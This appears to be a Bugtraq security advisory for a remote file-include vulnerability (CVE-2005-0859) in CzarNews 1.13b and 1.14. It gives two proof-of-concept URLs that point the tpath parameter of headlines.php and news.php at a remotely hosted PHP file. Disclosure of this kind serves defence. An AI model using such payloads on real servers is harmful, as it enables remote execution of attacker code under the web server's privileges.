BID:12857

CzarNews Remote File Include Vulnerability

Info

CzarNews Remote File Include Vulnerability

Bugtraq ID:	12857
Class:	Input Validation Error
CVE:	CVE-2005-0859
Remote:	Yes
Local:	No
Published:	Mar 21 2005 12:00AM
Updated:	Jun 14 2006 07:16PM
Credit:	Discovery is credited to Frank 'brOmstar' Reissner.
Vulnerable:	CzarNews CzarNews 1.13 b CzarNews CzarNews 1.14

Not Vulnerable:

Discussion

CzarNews Remote File Include Vulnerability

CzarNews is prone to a remote file-include vulnerability.

An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.

CzarNews 1.13b is reported vulnerable; other versions may be affected as well.

Exploit / POC

CzarNews Remote File Include Vulnerability

An exploit is not required.

Proof-of-concept examples are available:

http://www.example.com/research/news/CzarNewsv113b/headlines.php?tpath=http://www.example.org/cn_config.php

http://www.example.com/research/news/CzarNewsv113b/news.php?tpath=http://www.example.org/cn_config.php

Solution / Fix

CzarNews Remote File Include Vulnerability

Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]:[email protected]

References

CzarNews Remote File Include Vulnerability

References:

CzarNews Product Page (CzarNews)
CzarNews v1.14 Version - Remote File Include Vulnerabilities (SpC-x)